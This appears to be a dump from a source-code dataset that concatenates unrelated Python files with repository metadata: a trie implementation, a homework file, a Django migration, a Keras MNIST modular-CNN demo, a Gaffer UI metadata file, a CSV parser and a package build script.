update-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/update-endpoint.html
"""
parameter_display_string = """
# application-id : The unique identifier for the application. This identifier is displayed as the Project ID on the Amazon Pinpoint console.
# endpoint-id : The unique identifier for the endpoint.
"""
add_option_dict = {}
add_option_dict["parameter_display_string"] = parameter_display_string
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
write_two_parameter("pinpoint", "delete-endpoint", "application-id", "endpoint-id", add_option_dict)
|
[
"[email protected]"
] | |
210ea9a60a611db409d76c3c0405210c78d2cfcc
|
2b7cd8141d6c17572c05d4d70e3e616e02449e72
|
/python/GafferSceneUI/CollectScenesUI.py
|
341298801206215eb7677d5fcea14b99ce048bf9
|
[
"BSD-3-Clause"
] |
permissive
|
gray10b/gaffer
|
45aefd4ebbf515d5b491777a3bfd027d90715114
|
828b3b59f1154b0a14020cbf9a292c9048c09968
|
refs/heads/master
| 2021-01-02T09:11:13.137347 | 2017-08-04T05:07:31 | 2017-08-04T05:07:31 | 99,158,553 | 0 | 0 | null | 2017-08-02T20:34:13 | 2017-08-02T20:34:13 | null |
UTF-8
|
Python
| false | false | 3,233 |
py
|
##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferScene
Gaffer.Metadata.registerNode(
GafferScene.CollectScenes,
"description",
"""
Builds a scene by bundling multiple input scenes together, each
under their own root location. Instead of using an array of inputs
like the Group node, a single input is used instead, and a context
variable is provided so that a different hierarchy can be generated
under each root location. This is especially powerful for building
dynamic scenes where the number of inputs is not known prior to
building the node graph.
Since merging globals from multiple scenes often doesn't make sense,
the output globals are taken directly from the scene corresponding to
`rootNames[0]`.
""",
plugs = {
"rootNames" : [
"description",
"""
The names of the locations to create at the root of
the output scene. The input scene is copied underneath
each of these root locations.
Often the rootNames will be driven by an expression that generates
a dynamic number of root locations, perhaps by querying an asset
management system or listing cache files on disk.
""",
],
"rootNameVariable" : [
"description",
"""
The name of a context variable that is set to the current
root name when evaluating the input scene. This can be used
in upstream expressions and string substitutions to generate
a different hierarchy under each root location.
""",
],
}
)
|
[
"[email protected]"
] | |
f2dbfe14a65b0edc19d892ddcc7a57467691b220
|
f87f51ec4d9353bc3836e22ac4a944951f9c45c0
|
/.history/HW01_20210624144937.py
|
b9d45c1f373833420f3987ed361ba22bbc6b3abd
|
[] |
no_license
|
sanjayMamidipaka/cs1301
|
deaffee3847519eb85030d1bd82ae11e734bc1b7
|
9ddb66596497382d807673eba96853a17884d67b
|
refs/heads/main
| 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,177 |
py
|
"""
Georgia Institute of Technology - CS1301
HW01 - Functions and Expressions
Collaboration Statement:
"""
#########################################
"""
Function Name: bake()
Parameters: cakes (int), cupcakes (int), cookies (int)
Returns: None
"""
def bake(cakes, cupcakes, cookies):
cake_time = cakes*100 #time in minutes for each cake
cupcakes_time = cupcakes*70 #same as above but for the other items
cookies_time = cookies*45
total_time = cake_time + cupcakes_time + cookies_time #stores the total time used to make all the items
hours = total_time//60 #converts the total minutes into the appropriate amount of hours and minutes
minutes = total_time % 60
print('It will take {} hours and {} minutes to make {} cakes, {} cupcakes, and {} cookies.'.format(hours, minutes, cakes, cupcakes, cookies)) #formats the information and prints out the results
#########################################
"""
Function Name: cakeVolume()
Parameters: radius (int), height (int)
Returns: None
"""
def cakeVolume(radius, height):
volume = 3.14 * radius**2 * height #calculating volume with the volume formula
rounded_volume = round(volume, 2) #rounding my answer to 2 places
print('The volume of the cake is {}.'.format(rounded_volume))
#########################################
"""
Function Name: celebrate()
Parameters: pizzas (int), pastas (int), burgers (int), tipPercent (int)
Returns: None
"""
def celebrate(pizzas, pastas, burgers, tipPercent):
pizzas_price = pizzas*14
pastas_price = pastas*10
burgers_price = burgers*7
total_price = pizzas_price + pastas_price + burgers_price
tip = total_price * (tipPercent/100)
print()
#########################################
"""
Function Name: bookstore()
Parameters: daysBorrowed (int)
Returns: None
"""
def bookstore(daysBorrowed):
pass
#########################################
"""
Function Name: monthlyAllowance()
Parameters: allowance (int), savingsPercentage (int)
Returns: None
"""
def monthlyAllowance(allowance, savingsPercentage):
pass
bake(1, 3, 12)
cakeVolume(5, 8)
|
[
"[email protected]"
] | |
19e5b00f91bf0b3b5006b61638f0eaf93703a415
|
cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98
|
/leet/facebook/strings_arrays/implement_trie(prefix_tree).py
|
d2417b0002dda188bd8067925406649cf3692fca
|
[] |
no_license
|
arsamigullin/problem_solving_python
|
47715858a394ba9298e04c11f2fe7f5ec0ee443a
|
59f70dc4466e15df591ba285317e4a1fe808ed60
|
refs/heads/master
| 2023-03-04T01:13:51.280001 | 2023-02-27T18:20:56 | 2023-02-27T18:20:56 | 212,953,851 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,538 |
py
|
# this solution is slow but looks right
# we declared TrieNode. It store list of TrieNodes inside of length 26
class TrieNode:
def __init__(self):
self.links = [None] * 26
self.end = False
def get(self, char):
return self.links[ord(char) - ord('a')]
def contains(self, char):
return self.links[ord(char) - ord('a')] != None
def put(self, char, node):
index = ord(char) - ord('a')
self.links[index] = node
def is_end(self):
return self.end
def set_end(self):
self.end = True
class Trie:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
def insert(self, word: str) -> None:
"""
Inserts a word into the trie.
"""
node = self.root
for ch in word:
if not node.contains(ch):
node.put(ch, TrieNode())
node = node.get(ch)
node.set_end()
def __search_prefix(self, word):
node = self.root
for ch in word:
if node.contains(ch):
node = node.get(ch)
else:
return None
return node
def search(self, word: str) -> bool:
"""
Returns if the word is in the trie.
"""
node = self.__search_prefix(word)
return node is not None and node.is_end()
def startsWith(self, prefix: str) -> bool:
"""
Returns if there is any word in the trie that starts with the given prefix.
"""
node = self.__search_prefix(prefix)
return node is not None
# Your Trie object will be instantiated and called as such:
# obj = Trie()
# obj.insert(word)
# param_2 = obj.search(word)
# param_3 = obj.startsWith(prefix)
# this solution is much faster but underneath it uses dict
class TrieDict:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = dict()
def insert(self, word: str) -> None:
"""
Inserts a word into the trie.
"""
currNode = self.root
for c in word:
if c not in currNode:
currNode[c] = dict()
currNode = currNode[c]
# this placeholder denotes the end of a string
# consider these two words abcc and abccd
# after inserting the words to the trie we have
# {'a': {'b': {'c': {'c': {'#': '#'}}}}}
# {'a': {'b': {'c': {'c': {'#': '#', 'd': {'#': '#'}}}}}}
# when searching the word after reaching the latest letter in word
# we also check if the '#' among children of the latest letter
# so the '#' allows us to say if the whole word (not prefix) is in the Trie
currNode['#'] = '#'
print(self.root)
def search(self, word: str) -> bool:
"""
Returns if the word is in the trie.
"""
currNode = self.root
for c in word:
if c not in currNode:
return False
currNode = currNode[c]
return '#' in currNode
def startsWith(self, prefix: str) -> bool:
"""
Returns if there is any word in the trie that starts with the given prefix.
"""
currNode = self.root
for c in prefix:
if c not in currNode:
return False
currNode = currNode[c]
return True
if __name__ == "__main__":
s = TrieDict()
s.insert("abcc")
s.insert("abccd")
|
[
"[email protected]"
] | |
37c1b77dd3586311b40f194e2b54e9d3196a58e6
|
f874b3bffdf98ea52a12f9cd08566557e33d4c98
|
/extract_info.py
|
661aedd6a01faa476fa02e92316332480fa98e79
|
[
"Apache-2.0"
] |
permissive
|
lmorillas/recursoscaa
|
8e567246f722a38a7fb61dd6a884fd0d153cd338
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
refs/heads/master
| 2018-12-28T00:24:31.042017 | 2015-08-29T08:13:23 | 2015-08-29T08:13:23 | 32,229,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,684 |
py
|
from amara.bindery import html
from amara.lib import U
from urlparse import urljoin
doc = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations')
doc2 = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations/2')
links = []
datos = []
def extract_links(doc):
return doc.xml_select('//ul[@class="thumbnailFollowGrid"]/li//a')
links.extend(extract_links(doc))
links.extend(extract_links(doc2))
print len(links), 'recursos a extraer ...'
def encode_data(d):
for k in d.keys():
d[k] = d[k].encode('utf-8')
return d
def extract_data(link):
item = {}
_link = urljoin('http://es.slideshare.net/', U(link.href))
_doc = html.parse(_link)
if doc:
print _link
item['url'] = _link
item['id'] = _link.split('/')[-1]
item['autor'] = []
_label = U(_doc.xml_select('//h1[contains(@class, "slideshow-title-text")]')).strip()
if u'Romero' in _label:
item['autor'].append('David Romero')
item['autor'].append(U(_doc.xml_select('//a[@class="j-author-name"]')).strip())
item['label'] = _label.split('-')[0].strip()
item['fecha'] = U(_doc.xml_select('//time[@itemprop="datePublished"]')).strip()
_desc = U(_doc.xml_select('//p[contains(@class, "j-desc-expand")]')).strip()
if _desc:
item['desc'] = _desc
else:
item['desc'] = U(_doc.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
item['imagen'] = _doc.xml_select(u'//img[contains(@class, "slide_image")]')[0].src
return item
datos = [extract_data(l) for l in links]
import json
json.dump({'items': datos}, open('datos.json', 'w'))
'''
d2 = html.parse(urljoin('http://es.slideshare.net/', l)
print d2.xml_encode()
d2.xml_select('//time')
map(d2.xml_select('//time'), lambda x: print x)
map( lambda x: print x, d2.xml_select('//time'))
lambda x: print x
__version__
version
_version_
print d2.xml_select('//time')[0]
print d2.xml_select('//time')[1]
print d2.xml_select('//time[@itemprop="datePublished"]')
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//a[@class="j-author-name"]/text()')
print d2.xml_select('//a[@class="j-author-name"]')
print d2.xml_select('//a[@class="j-author-name"]')
from amara.lib import U
print U(d2.xml_select('//a[@class="j-author-name"]')).strip()
print U(d2.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
print U(d2.xml_select('//a[contains(@class, "j-download")]')).strip()
history
'''
|
[
"[email protected]"
] | |
d7043a83bf47e5a0fc3d1216e5b5cab408f81ede
|
11a246743073e9d2cb550f9144f59b95afebf195
|
/advent/2017/day8.py
|
6b9e3586e8658bcf41dbd5263b00183231315b58
|
[] |
no_license
|
ankitpriyarup/online-judge
|
b5b779c26439369cedc05c045af5511cbc3c980f
|
8a00ec141142c129bfa13a68dbf704091eae9588
|
refs/heads/master
| 2020-09-05T02:46:56.377213 | 2019-10-27T20:12:25 | 2019-10-27T20:12:25 | 219,959,932 | 0 | 1 | null | 2019-11-06T09:30:58 | 2019-11-06T09:30:57 | null |
UTF-8
|
Python
| false | false | 574 |
py
|
from collections import *
import itertools
import random
import sys
def main():
d = defaultdict(int)
ans = -19
for line in sys.stdin:
words = line.strip().split()
d_reg = words[0]
sgn = 1 if words[1] == 'inc' else -1
amt = int(words[2])
reg = words[4]
e = words[5]
amt2 = int(words[6])
val = d[reg]
if eval(str(val) + ' ' + e + ' ' + str(amt2)):
d[d_reg] += sgn * amt
# ans = max(ans, (max(v for k, v in d.items())))
print(max(v for k, v in d.items()))
main()
|
[
"[email protected]"
] | |
d1e1ea3ca62fa8c7eee1ea56bcf21143db9db802
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03962/s618919847.py
|
7c3073e9045ef040a154ec5d8acb94554d03edf5
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 514 |
py
|
import sys
import math
from functools import reduce
import bisect
def getN():
return int(input())
def getNM():
return map(int, input().split())
def getList():
return list(map(int, input().split()))
def input():
return sys.stdin.readline().rstrip()
# input = sys.stdin.buffer.readline
def index(a, x):
i = bisect.bisect_left(a, x)
if i != len(a) and a[i] == x:
return i
return False
#############
# MAIN CODE #
#############
a, b, c = getNM()
print(len({a, b, c}))
|
[
"[email protected]"
] | |
92275752bbea081287f13884cac8c5b556fa1fd2
|
5c58587ebfbf56192b3dc6ed6f43bc002c8e2cff
|
/payments/migrations/0026_auto_20180906_1023.py
|
bb3127132c77be7ffde946ce16ac96b8870c7008
|
[] |
no_license
|
hossamelneily/nexchange
|
fb9a812cfc72ac00b90cf64d6669a8129c2d2d4b
|
6d69274cd3808989abe2f5276feb772d1f0fa8b4
|
refs/heads/release
| 2022-12-13T09:20:47.297943 | 2019-02-12T08:20:34 | 2019-02-12T08:20:34 | 210,064,740 | 1 | 2 | null | 2022-12-09T00:54:01 | 2019-09-21T23:19:34 |
Python
|
UTF-8
|
Python
| false | false | 4,388 |
py
|
# Generated by Django 2.0.7 on 2018-09-06 10:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0066_remove_transactionprice_type'),
('payments', '0025_auto_20180822_1537'),
]
operations = [
migrations.CreateModel(
name='Bank',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('modified_on', models.DateTimeField(auto_now=True)),
('name', models.CharField(blank=True, max_length=255, null=True)),
('website', models.URLField(blank=True, null=True)),
('phone', models.CharField(blank=True, max_length=50, null=True)),
('country', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='core.Country')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BankBin',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('modified_on', models.DateTimeField(auto_now=True)),
('bin', models.CharField(default=None, max_length=15, unique=True)),
('checked_external', models.BooleanField(default=False)),
('bank', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.Bank')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CardCompany',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('modified_on', models.DateTimeField(auto_now=True)),
('name', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CardLevel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('modified_on', models.DateTimeField(auto_now=True)),
('name', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CardType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('modified_on', models.DateTimeField(auto_now=True)),
('name', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='bankbin',
name='card_company',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.CardCompany'),
),
migrations.AddField(
model_name='bankbin',
name='card_level',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.CardLevel'),
),
migrations.AddField(
model_name='bankbin',
name='card_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.CardType'),
),
migrations.AddField(
model_name='paymentpreference',
name='bank_bin',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.BankBin'),
),
]
|
[
"[email protected]"
] | |
7b10bae824de4ead5ffbb387b689114066ec431d
|
5d304c6ec0f01edee73e3b612f84307060c0da54
|
/letter_combinations_of_a_phone_number.py
|
089f3c0c2377b7e620e80a61fbd5b12517d716e8
|
[] |
no_license
|
xartisan/leetcode-solutions-in-python
|
cfa06b9e02f7ec0446cf6b71df4ea46caa359adc
|
7e3929a4b5bd0344f93373979c9d1acc4ae192a7
|
refs/heads/master
| 2020-03-14T17:10:07.957089 | 2018-07-29T10:11:01 | 2018-07-29T10:11:01 | 131,713,447 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 499 |
py
|
class Solution:
def letterCombinations(self, digits):
"""
:type digits: str
:rtype: List[str]
"""
keys = ["", "", "abc", "def", "ghi", "jkl", "mno", "pqrs", "tuv", "wxyz"]
rv = []
for d in digits:
d = int(d)
tmp = []
for c in keys[d]:
if rv:
tmp.extend(s + c for s in rv)
else:
tmp.append(c)
rv = tmp
return rv
|
[
"[email protected]"
] | |
d3f0f22a9f875992c367e7fce63ee8366b08f220
|
5254c3a7e94666264120f26c87734ad053c54541
|
/Revision de Pares/Semana N°5/Caso 2/05-0-gin-fileparse.py-vir-2020-09-08_19.44.49.py
|
c1df151428fe518671cc730320bf9ea5a29de07f
|
[] |
no_license
|
ccollado7/UNSAM---Python
|
425eb29a2df8777e9f892b08cc250bce9b2b0b8c
|
f2d0e7b3f64efa8d03f9aa4707c90e992683672d
|
refs/heads/master
| 2023-03-21T17:42:27.210599 | 2021-03-09T13:06:45 | 2021-03-09T13:06:45 | 286,613,172 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,352 |
py
|
#fileparse.py
import csv
def parse_csv(nombre_archivo, select = None, types = None, has_headers=True):
'''
Parsea un archivo CSV en una lista de registros.
Se puede seleccionar sólo un subconjunto de las columnas, determinando el parámetro select, que debe ser una lista de nombres de las columnas a considerar.
'''
with open(nombre_archivo) as f:
filas = csv.reader(f)
if has_headers:
# Lee los encabezados del archivo
encabezados = next(filas)
if select:
# Si se indicó un selector de columnas,
# buscar los índices de las columnas especificadas.
# Y en ese caso achicar el conjunto de encabezados para diccionarios
indices = [encabezados.index(nombre_columna) for nombre_columna in select]
encabezados = select
else:
indices = []
registros = []
for fila in filas:
if not fila: # Saltear filas vacías
continue
# Filtrar la fila si se especificaron columnas
if indices:
if types:
fila = [tipo(fila[index]) for index,tipo in zip(indices,types)]
else:
fila = [fila[index] for index in indices]
# Armar el diccionario
registro = dict(zip(encabezados, fila))
registros.append(registro)
else:
registros = []
for fila in filas:
if not fila: # Saltear filas vacías
continue
if types:
fila = [tipo(elem) for tipo,elem in (zip(types, fila))]
# Agregar la tupla
registro = tuple(fila)
registros.append(registro)
return registros
#%%
camion_1 = parse_csv('camion.csv', types=[str, int, float])
print(camion_1)
#%%
camion_2 = parse_csv('camion.csv', types=[str, str, str])
print(camion_2)
#%%
camion_3 = parse_csv('camion.csv', select = ['nombre', 'cajones'], types=[str, int])
print(camion_3)
#%%
camion_4 = parse_csv('camion.csv', types=[str, str, float])
print(camion_4)
#%%
camion_5 = parse_csv('camion.csv', types=[str, int, str])
print(camion_5)
|
[
"[email protected]"
] | |
77646e2ec0616be8c2082741e2ca6efa9902dd3a
|
ef457162d79be971f52ee96b1891764a2d230e8b
|
/demo.py
|
0b61466993849c1bffa5dd4056ad7be10ebc7073
|
[] |
no_license
|
LuoJiaji/modularCNN
|
f2239f6b4ed378fede4401f6e90d9b1d5acc8c70
|
b8591c3924abeccaebfad56289a185f904da8608
|
refs/heads/master
| 2020-06-18T12:57:59.192061 | 2019-07-11T13:20:08 | 2019-07-11T13:20:08 | 196,309,757 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,242 |
py
|
import random
import numpy as np
import matplotlib.pyplot as plt
from keras.datasets import mnist
from keras.preprocessing import image
from keras.models import Model, load_model
from keras.layers import Input, Flatten, Dense, Dropout, Lambda
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.optimizers import RMSprop, SGD
from keras.utils.vis_utils import plot_model
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
x_test = np.expand_dims(x_test, axis = 3)
def get_random_batch(x, y, l, batchsize):
ind_p = np.where(y_train == l)[0]
ind_n = np.where(y_train != l)[0]
x_batch = []
y_batch = []
l_p = len(ind_p)
l_n = len(ind_n)
for i in range(int(batchsize/2)):
ind = random.randrange(l_p)
x_batch.append(x[ind_p[ind]])
y_batch.append(1)
# print(y[ind_p[ind]])
ind = random.randrange(l_n)
x_batch.append(x[ind_n[ind]])
y_batch.append(0)
# print(y[ind_n[ind]])
x_batch = np.array(x_batch)
y_batch = np.array(y_batch)
y_batch = y_batch.astype('float32')
return x_batch, y_batch
x_batch, y_batch = get_random_batch(x_train, y_train, 0, 128)
input_shape = (28,28,1)
input_data = Input(shape=input_shape)
x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv1')(input_data)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
x = Flatten(name='flatten')(x)
x = Dense(128, activation='relu', name='fc1')(x)
x = Dense(1, activation='sigmoid', name='fc2')(x)
model = Model(input_data, x)
#model.compile(optimizer='rmsprop', loss='mse', metrics=['accuracy'])
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
#i=3
for i in range(10):
input_shape = (28,28,1)
input_data = Input(shape=input_shape)
x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv1')(input_data)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
x = Flatten(name='flatten')(x)
x = Dense(128, activation='relu', name='fc1')(x)
x = Dense(1, activation='sigmoid', name='fc2')(x)
model = Model(input_data, x)
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
for it in range(5000):
x_batch, y_batch = get_random_batch(x_train, y_train, i, 256)
x_batch = np.expand_dims(x_batch, axis = 3)
train_loss, train_acc = model.train_on_batch(x_batch, y_batch)
if it % 100 == 0:
print('i:', i, 'it:', it, 'loss', train_loss, 'acc', train_acc)
model.save('./models/ModularCNN_' + str(i) + '.h5')
# 单个模型测试
i=9
model = load_model('./models/ModularCNN_9.h5')
test_label = np.copy(y_test)
test_label[np.where(y_test == i)] = 1
test_label[np.where(y_test != i)] = 0
#x_test = np.expand_dims(x_test, axis = 3)
pre = model.predict(x_test)
pre = pre[:,0]
pre[np.where(pre < 0.2)] = 0
pre[np.where(pre >= 0.2)] = 1
acc = np.mean(pre == test_label)
# 整合模型,综合测试
input_shape = (28,28,1)
input_data = Input(shape=input_shape)
model_0 = load_model('./models/ModularCNN_0.h5')
model_1 = load_model('./models/ModularCNN_1.h5')
model_2 = load_model('./models/ModularCNN_2.h5')
model_3 = load_model('./models/ModularCNN_3.h5')
model_4 = load_model('./models/ModularCNN_4.h5')
model_5 = load_model('./models/ModularCNN_5.h5')
model_6 = load_model('./models/ModularCNN_6.h5')
model_7 = load_model('./models/ModularCNN_7.h5')
model_8 = load_model('./models/ModularCNN_8.h5')
model_9 = load_model('./models/ModularCNN_9.h5')
output_0 = model_0(input_data)
output_1 = model_1(input_data)
output_2 = model_2(input_data)
output_3 = model_3(input_data)
output_4 = model_4(input_data)
output_5 = model_5(input_data)
output_6 = model_6(input_data)
output_7 = model_7(input_data)
output_8 = model_8(input_data)
output_9 = model_9(input_data)
model = Model(inputs = input_data,
outputs=[output_0, output_1, output_2, output_3, output_4,
output_5, output_6, output_7, output_8, output_9])
#plot_model(model, to_file='./models_visualization/modularCNN.pdf',show_shapes=True)
#plot_model(model, to_file='./models_visualization/modularCNN.png',show_shapes=True)
pre = model.predict(x_test)
pre = np.array(pre)
pre = np.squeeze(pre)
pre = pre.T
pre = np.argmax(pre, axis = 1)
acc = np.mean(pre == y_test)
## 未知数据测试
img = image.load_img('./dataset/img/G/Q2Fsdmlub0hhbmQudHRm.png', target_size=(28, 28))
img = image.img_to_array(img)
img = img/255
img = img[:,:,0]
plt.imshow(img)
img = np.expand_dims(img, axis=0)
img = np.expand_dims(img, axis=3)
pre = model.predict(img)
pre = np.array(pre)
pre = np.squeeze(pre)
img_rand = np.random.rand(1,28,28,1)
pre = model.predict(img)
pre = np.array(pre)
pre = np.squeeze(pre)
|
[
"[email protected]"
] | |
613558e1f0a6f4199d62e2feae12a2ba06b09eba
|
66e45a2760db8a1fc580689586806c2e3cce0517
|
/pymontecarlo/options/model/base.py
|
8951f563fdc581a862298aeec9784c0e6a2631d2
|
[] |
no_license
|
arooney/pymontecarlo
|
4b5b65c88737de6fac867135bc05a175c8114e48
|
d2abbb3e9d3bb903ffec6dd56472470e15928b46
|
refs/heads/master
| 2020-12-02T18:01:42.525323 | 2017-05-19T16:44:30 | 2017-05-19T16:44:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 649 |
py
|
"""
Base models.
"""
# Standard library modules.
import abc
import enum
# Third party modules.
# Local modules.
from pymontecarlo.options.base import Option
# Globals and constants variables.
class ModelMeta(enum.EnumMeta, abc.ABCMeta):
pass
class Model(Option, enum.Enum, metaclass=ModelMeta):
def __init__(self, fullname, reference=''):
self.fullname = fullname
self.reference = reference
def __eq__(self, other):
# NOTE: Must be implemented from Option,
# but should only used equality from Enum
return enum.Enum.__eq__(self, other)
def __str__(self):
return self.fullname
|
[
"[email protected]"
] | |
bbb0e5789cc95e133b10dc78292d1330aa319f50
|
09d349155446f2f32519cfc7deb7f79b1138a158
|
/kraft/actions.py
|
d7a5fba1e5bcf34353359243e9c51f253c87c7e3
|
[] |
no_license
|
marcin-/pardususer.de
|
632d7fb4c5a9252dbcf82711a5da126523d3b8e8
|
1d4bb1d1f9da113cf2b8cbcc6b544ec9b9616862
|
refs/heads/master
| 2016-09-05T23:22:38.726769 | 2012-10-08T20:40:39 | 2012-10-08T20:40:39 | 6,114,809 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 810 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pisi.actionsapi import cmaketools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
shelltools.makedirs("build")
shelltools.cd("build")
cmaketools.configure("-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_CXX_FLAGS_RELEASE:STRING='-DNDEBUG -DQT_NO_DEBUG' \
-DCMAKE_C_FLAGS_RELEASE:STRING='-DNDEBUG'", sourceDir="..")
def build():
shelltools.cd("build")
cmaketools.make()
def install():
shelltools.cd("build")
cmaketools.install()
shelltools.cd("..")
pisitools.dodoc("TODO", "Changes.txt", "INSTALL", "README", "COPYING", "Releasenotes.txt", "AUTHORS")
|
[
"[email protected]"
] | |
5005cb8e54066070f254014fede0db6ecb90ed09
|
b6df7cda5c23cda304fcc0af1450ac3c27a224c1
|
/nlp/preprocessing.py
|
441402923997d2e7d7041d50ca10938068282e69
|
[] |
no_license
|
vieira-rafael/py-search
|
88ee167fa1949414cc4f3c98d33f8ecec1ce756d
|
b8c6dccc58d72af35e4d4631f21178296f610b8a
|
refs/heads/master
| 2021-01-21T04:59:36.220510 | 2016-06-20T01:45:34 | 2016-06-20T01:45:34 | 54,433,313 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
class PreProcessing:
def __init__(self):
stopwords = ["and","del","from","not","while","as","elif","global","or","with","assert","else","if","pass","yield","break","except","import","print","class","exec","in","raise","continue","finally","is","return","def","for","lambda","try"];
|
[
"[email protected]"
] | |
d425739853edd3970661241960467b810be5829e
|
ab5731ae6e190a9b44b1cddbd11af89277302de9
|
/read_json/data_json.py
|
686c168a2ed574d935bcf65b3bbd202919f755d4
|
[] |
no_license
|
MachineLP/py_workSpace
|
e532781aab51c54a87602c387acd3199f9a75140
|
7937f3706e8d2d8a0e25ba0648bee6d1fcb27234
|
refs/heads/master
| 2021-08-29T02:56:02.415509 | 2021-08-23T10:38:59 | 2021-08-23T10:38:59 | 117,516,956 | 22 | 18 | null | null | null | null |
UTF-8
|
